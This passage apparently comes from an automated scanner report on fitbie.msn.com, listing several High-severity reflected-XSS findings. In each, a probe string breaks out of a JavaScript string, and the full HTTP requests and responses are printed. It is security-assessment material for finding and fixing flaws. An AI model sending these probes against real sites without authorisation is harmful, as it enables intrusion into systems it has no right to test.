This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default5f8bd'%3b7858d5db37/files/200276112-001-TH_0.jpg?1290562306 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:32 +0000
ETag: "1297607372-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:29:32 GMT
Date: Sun, 13 Feb 2011 14:29:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default5f8bd';7858d5db37?destination=node%2Fdefault5f8bd';7858d5db37&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.59. http://fitbie.msn.com/sites/default/files/56384394-TH.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/56384394-TH.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 205e4'%3b22a66a32303 was submitted in the REST URL parameter 2. This input was echoed as 205e4';22a66a32303 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default205e4'%3b22a66a32303/files/56384394-TH.jpg?1287517127 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:27 +0000
ETag: "1297607187-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:28 GMT
Date: Sun, 13 Feb 2011 14:26:28 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default205e4';22a66a32303?destination=node%2Fdefault205e4';22a66a32303&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.60. http://fitbie.msn.com/sites/default/files/56570375-TH.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/56570375-TH.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b891'%3bf1dfd5c5249 was submitted in the REST URL parameter 2. This input was echoed as 4b891';f1dfd5c5249 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default4b891'%3bf1dfd5c5249/files/56570375-TH.jpg?1287526062 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:30 +0000
ETag: "1297607190-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:30 GMT
Date: Sun, 13 Feb 2011 14:26:30 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default4b891';f1dfd5c5249?destination=node%2Fdefault4b891';f1dfd5c5249&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.61. http://fitbie.msn.com/sites/default/files/57278017-TH_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/57278017-TH_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e4db'%3bdab3e8cc3ca was submitted in the REST URL parameter 2. This input was echoed as 5e4db';dab3e8cc3ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default5e4db'%3bdab3e8cc3ca/files/57278017-TH_0.jpg?1290563923 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:28 +0000
ETag: "1297607368-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:29 GMT
Date: Sun, 13 Feb 2011 14:29:29 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default5e4db';dab3e8cc3ca?destination=node%2Fdefault5e4db';dab3e8cc3ca&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.62. http://fitbie.msn.com/sites/default/files/6-5-85-04-th_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/6-5-85-04-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e45fb'%3b75bb9c38a63 was submitted in the REST URL parameter 2. This input was echoed as e45fb';75bb9c38a63 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaulte45fb'%3b75bb9c38a63/files/6-5-85-04-th_0.jpg?1287609297 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:32 +0000
ETag: "1297607372-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:32 GMT
Date: Sun, 13 Feb 2011 14:29:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulte45fb';75bb9c38a63?destination=node%2Fdefaulte45fb';75bb9c38a63&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.63. http://fitbie.msn.com/sites/default/files/77292027-th.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/77292027-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8b60'%3bc24714b7ad8 was submitted in the REST URL parameter 2. This input was echoed as f8b60';c24714b7ad8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/defaultf8b60'%3bc24714b7ad8/files/77292027-th.jpg?1287330146 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:30 +0000
ETag: "1297607190-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:31 GMT
Date: Sun, 13 Feb 2011 14:26:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultf8b60';c24714b7ad8?destination=node%2Fdefaultf8b60';c24714b7ad8&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.64. http://fitbie.msn.com/sites/default/files/78322433-TH.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/78322433-TH.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 590a7'%3ba29870cedcf was submitted in the REST URL parameter 2. This input was echoed as 590a7';a29870cedcf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default590a7'%3ba29870cedcf/files/78322433-TH.jpg?1288040105 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:35 +0000
ETag: "1297607195-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:36 GMT
Date: Sun, 13 Feb 2011 14:26:36 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default590a7';a29870cedcf?destination=node%2Fdefault590a7';a29870cedcf&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.65. http://fitbie.msn.com/sites/default/files/78376830-TH_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/78376830-TH_0.jpg

Issue detail

